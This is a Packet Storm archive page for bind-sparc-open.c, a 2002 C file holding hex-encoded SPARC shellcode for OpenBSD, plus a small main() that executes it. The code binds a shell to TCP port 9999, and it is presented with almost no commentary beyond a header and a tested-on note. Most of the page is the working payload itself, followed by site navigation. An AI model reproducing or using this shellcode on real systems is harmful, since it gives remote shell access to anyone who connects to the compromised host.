exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

bind-sparc-open.c

bind-sparc-open.c
Posted Jul 24, 2002
Authored by Killah

Shellcode for OpenBSD under Sparc which binds a shell to tcp port 9999. Tested on OpenBSD 2.6(Sun4m) on a Sparc-station 5.

tags | shell, tcp, shellcode
systems | openbsd
SHA-256 | b0b0be40c62d1e42e3a74567f2fc01b6a6d96ef13ad6a18d5267707d9055fda8

bind-sparc-open.c

Change Mirror Download
/*
* bind shellcode, will bind on port : 9999/tcp.
* Os : OpenBSD, Architecture : Sparc.
*
* tested under : OpenBSD 2.6(Sun4m) Sparc-station 5.
*
* Copyright 2002 killah@hack.gr
*
*/
long sparc_bind[]=
{
0x9de3bf78,0x90102002,0x92102001,0x94102000,0x82102061,0x91d02000,0xd027bff4,
0x90102002,0xd02fbfd9,0x13000009,0x9012630f,0xd037bfda,0xc027bfdc,0x9207bfd8,
0xd007bff4,0x94102010,0x82102068,0x91d02000,0xd007bff4,0x92102005,0x8210206a,
0x91d02000,0x9207bfd8,0x9407bfec,0xd007bff4,0x8210201e,0x91d02000,0xd027bff0,
0xd007bff0,0x92102000,0x8210205a,0x91d02000,0xd007bff0,0x92102001,0x8210205a,
0x91d02000,0xd007bff0,0x92102002,0x8210205a,0x91d02000,0x2d0bd89a,0xac15a16e,
0x2f0bdcda,0x900b800e,0x9203a008,0x9422800a,0x9c03a010,0xec3bbff0,0xd023bff8,
0xc023bffc,0x8210203b,0x91d02000
};

int
main(void)
{
void (*f) (void);
f=(void *) sparc_bind;
// printf("shellcode len: %d\n", strlen(sparc_bind));
f();
}
/*EOF*/
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close